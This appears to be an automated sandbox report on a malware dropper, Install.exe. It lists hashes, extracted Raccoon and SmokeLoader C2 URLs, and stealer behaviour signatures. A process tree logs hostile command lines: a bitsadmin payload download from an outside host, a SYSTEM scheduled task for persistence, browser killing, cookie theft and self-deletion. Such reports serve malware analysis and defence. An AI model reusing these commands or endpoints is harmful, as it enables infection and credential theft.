Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1801s
  • max time network
    1754s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    06-05-2021 08:37

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 55 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 48 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 35 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 33 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 37 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
      PID:2744
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2756
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2664
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
          • Modifies registry class
          PID:2464
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2432
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1904
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1428
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1324
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1204
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1076
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:924
                      • C:\Users\Admin\AppData\Roaming\hfbsdtw
                        C:\Users\Admin\AppData\Roaming\hfbsdtw
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:4740
                        • C:\Users\Admin\AppData\Roaming\hfbsdtw
                          C:\Users\Admin\AppData\Roaming\hfbsdtw
                          3⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:3956
                      • C:\Users\Admin\AppData\Roaming\hfbsdtw
                        C:\Users\Admin\AppData\Roaming\hfbsdtw
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:4864
                        • C:\Users\Admin\AppData\Roaming\hfbsdtw
                          C:\Users\Admin\AppData\Roaming\hfbsdtw
                          3⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:4748
                      • C:\Users\Admin\AppData\Roaming\hfbsdtw
                        C:\Users\Admin\AppData\Roaming\hfbsdtw
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:4656
                        • C:\Users\Admin\AppData\Roaming\hfbsdtw
                          C:\Users\Admin\AppData\Roaming\hfbsdtw
                          3⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          PID:5820
                      • C:\Windows\system32\rundll32.exe
                        C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll",ASqacOXEm
                        2⤵
                        • Windows security modification
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        PID:1640
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                      1⤵
                        PID:1020
                      • C:\Users\Admin\AppData\Local\Temp\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1440
                        • C:\Users\Admin\AppData\Local\Temp\is-LHBQK.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-LHBQK.tmp\Install.tmp" /SL5="$80060,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                          2⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:1188
                          • C:\Users\Admin\AppData\Local\Temp\is-POOCH.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-POOCH.tmp\Ultra.exe" /S /UID=burnerch1
                            3⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3220
                            • C:\Program Files\Windows Mail\ZOHNVVSTLV\ultramediaburner.exe
                              "C:\Program Files\Windows Mail\ZOHNVVSTLV\ultramediaburner.exe" /VERYSILENT
                              4⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:2892
                              • C:\Users\Admin\AppData\Local\Temp\is-POP7A.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-POP7A.tmp\ultramediaburner.tmp" /SL5="$4002E,281924,62464,C:\Program Files\Windows Mail\ZOHNVVSTLV\ultramediaburner.exe" /VERYSILENT
                                5⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:572
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  6⤵
                                  • Executes dropped EXE
                                  PID:644
                            • C:\Users\Admin\AppData\Local\Temp\bd-7c297-c73-46ba9-a23ee591e914f\Gadoluwaqe.exe
                              "C:\Users\Admin\AppData\Local\Temp\bd-7c297-c73-46ba9-a23ee591e914f\Gadoluwaqe.exe"
                              4⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Modifies system certificate store
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2112
                            • C:\Users\Admin\AppData\Local\Temp\65-196d7-69f-f3a9a-80535feebed1f\Kysenexyvae.exe
                              "C:\Users\Admin\AppData\Local\Temp\65-196d7-69f-f3a9a-80535feebed1f\Kysenexyvae.exe"
                              4⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:2780
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dh1ztpe2.eub\KiffMainE1.exe & exit
                                5⤵
                                  PID:4220
                                  • C:\Users\Admin\AppData\Local\Temp\dh1ztpe2.eub\KiffMainE1.exe
                                    C:\Users\Admin\AppData\Local\Temp\dh1ztpe2.eub\KiffMainE1.exe
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4492
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lglxxj0r.bw4\001.exe & exit
                                  5⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4560
                                  • C:\Users\Admin\AppData\Local\Temp\lglxxj0r.bw4\001.exe
                                    C:\Users\Admin\AppData\Local\Temp\lglxxj0r.bw4\001.exe
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4816
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\svuqrxdj.w3h\installer.exe /qn CAMPAIGN="654" & exit
                                  5⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4784
                                  • C:\Users\Admin\AppData\Local\Temp\svuqrxdj.w3h\installer.exe
                                    C:\Users\Admin\AppData\Local\Temp\svuqrxdj.w3h\installer.exe /qn CAMPAIGN="654"
                                    6⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Enumerates connected drives
                                    • Modifies system certificate store
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of FindShellTrayWindow
                                    PID:5020
                                    • C:\Windows\SysWOW64\msiexec.exe
                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\svuqrxdj.w3h\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\svuqrxdj.w3h\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1620037979 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                      7⤵
                                        PID:2196
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kopx4jf0.2ww\gpooe.exe & exit
                                    5⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3728
                                    • C:\Users\Admin\AppData\Local\Temp\kopx4jf0.2ww\gpooe.exe
                                      C:\Users\Admin\AppData\Local\Temp\kopx4jf0.2ww\gpooe.exe
                                      6⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      • Suspicious use of WriteProcessMemory
                                      PID:4180
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        7⤵
                                          PID:4356
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4464
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5076
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4604
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\haqa3m2j.riv\google-game.exe & exit
                                      5⤵
                                        PID:4680
                                        • C:\Users\Admin\AppData\Local\Temp\haqa3m2j.riv\google-game.exe
                                          C:\Users\Admin\AppData\Local\Temp\haqa3m2j.riv\google-game.exe
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetWindowsHookEx
                                          • Suspicious use of WriteProcessMemory
                                          PID:4952
                                          • C:\Windows\SysWOW64\rundll32.exe
                                            "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                            7⤵
                                            • Loads dropped DLL
                                            • Suspicious use of WriteProcessMemory
                                            PID:4932
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\02wkif1t.mxf\huesaa.exe & exit
                                        5⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:4144
                                        • C:\Users\Admin\AppData\Local\Temp\02wkif1t.mxf\huesaa.exe
                                          C:\Users\Admin\AppData\Local\Temp\02wkif1t.mxf\huesaa.exe
                                          6⤵
                                          • Executes dropped EXE
                                          PID:4372
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4344
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                            • Executes dropped EXE
                                            PID:5768
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4760
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                            • Executes dropped EXE
                                            PID:5492
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\okbpvyck.csu\askinstall39.exe & exit
                                        5⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:4900
                                        • C:\Users\Admin\AppData\Local\Temp\okbpvyck.csu\askinstall39.exe
                                          C:\Users\Admin\AppData\Local\Temp\okbpvyck.csu\askinstall39.exe
                                          6⤵
                                            PID:4440
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c taskkill /f /im chrome.exe
                                              7⤵
                                                PID:5396
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /f /im chrome.exe
                                                  8⤵
                                                  • Kills process with taskkill
                                                  PID:5784
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dprnbvy4.ppt\setup.exe & exit
                                            5⤵
                                              PID:4832
                                              • C:\Users\Admin\AppData\Local\Temp\dprnbvy4.ppt\setup.exe
                                                C:\Users\Admin\AppData\Local\Temp\dprnbvy4.ppt\setup.exe
                                                6⤵
                                                • Executes dropped EXE
                                                PID:4688
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\dprnbvy4.ppt\setup.exe"
                                                  7⤵
                                                    PID:5980
                                                    • C:\Windows\SysWOW64\PING.EXE
                                                      ping 1.1.1.1 -n 1 -w 3000
                                                      8⤵
                                                      • Runs ping.exe
                                                      PID:5164
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yt1jvxy5.uri\y1.exe & exit
                                                5⤵
                                                  PID:5240
                                                  • C:\Users\Admin\AppData\Local\Temp\yt1jvxy5.uri\y1.exe
                                                    C:\Users\Admin\AppData\Local\Temp\yt1jvxy5.uri\y1.exe
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:5796
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\yt1jvxy5.uri\y1.exe"
                                                      7⤵
                                                        PID:4472
                                                        • C:\Windows\SysWOW64\timeout.exe
                                                          timeout /T 10 /NOBREAK
                                                          8⤵
                                                          • Delays execution with timeout.exe
                                                          PID:5520
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\givkeact.bwc\Setup_v3.exe & exit
                                                    5⤵
                                                      PID:5900
                                                      • C:\Users\Admin\AppData\Local\Temp\givkeact.bwc\Setup_v3.exe
                                                        C:\Users\Admin\AppData\Local\Temp\givkeact.bwc\Setup_v3.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:6064
                                                        • C:\Windows\SysWOW64\at.exe
                                                          "C:\Windows\System32\at.exe"
                                                          7⤵
                                                            PID:2776
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
                                                            7⤵
                                                            • Blocklisted process makes network request
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4440
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\System32\cmd.exe
                                                              8⤵
                                                                PID:4644
                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                  findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
                                                                  9⤵
                                                                    PID:4516
                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                    Fessura.exe.com Z
                                                                    9⤵
                                                                      PID:2312
                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
                                                                        10⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        • Suspicious behavior: MapViewOfSection
                                                                        PID:4660
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
                                                                          11⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:5148
                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                          11⤵
                                                                          • Executes dropped EXE
                                                                          PID:4604
                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                          11⤵
                                                                          • Executes dropped EXE
                                                                          PID:5052
                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                      ping 127.0.0.1 -n 30
                                                                      9⤵
                                                                      • Runs ping.exe
                                                                      PID:5240
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                  7⤵
                                                                    PID:5272
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5lqopdlk.urx\toolspab1.exe & exit
                                                                5⤵
                                                                  PID:6076
                                                                  • C:\Users\Admin\AppData\Local\Temp\5lqopdlk.urx\toolspab1.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\5lqopdlk.urx\toolspab1.exe
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:5116
                                                                    • C:\Users\Admin\AppData\Local\Temp\5lqopdlk.urx\toolspab1.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\5lqopdlk.urx\toolspab1.exe
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Checks SCSI registry key(s)
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      PID:5548
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1z4kfjdp.n2m\005.exe & exit
                                                                  5⤵
                                                                    PID:5124
                                                                    • C:\Users\Admin\AppData\Local\Temp\1z4kfjdp.n2m\005.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\1z4kfjdp.n2m\005.exe
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:5756
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u03b5qzg.0fm\SunLabsPlayer.exe /S & exit
                                                                    5⤵
                                                                      PID:5804
                                                                      • C:\Users\Admin\AppData\Local\Temp\u03b5qzg.0fm\SunLabsPlayer.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\u03b5qzg.0fm\SunLabsPlayer.exe /S
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Drops file in Program Files directory
                                                                        PID:5188
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB3C2.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:2904
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB3C2.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:5180
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB3C2.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:3940
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB3C2.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:3764
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB3C2.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:5700
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB3C2.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                      PID:3924
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB3C2.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                      • Checks for any installed AV software in registry
                                                                                      PID:1968
                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                      "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                      7⤵
                                                                                      • Download via BitsAdmin
                                                                                      PID:4704
                                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pNFM5uOTEhcduVS4 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in Program Files directory
                                                                                      PID:5228
                                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pTu7FDc7mojSd2jD -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4556
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB3C2.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4356
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB3C2.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                        PID:412
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB3C2.tmp\tempfile.ps1"
                                                                                        7⤵
                                                                                          PID:1256
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB3C2.tmp\tempfile.ps1"
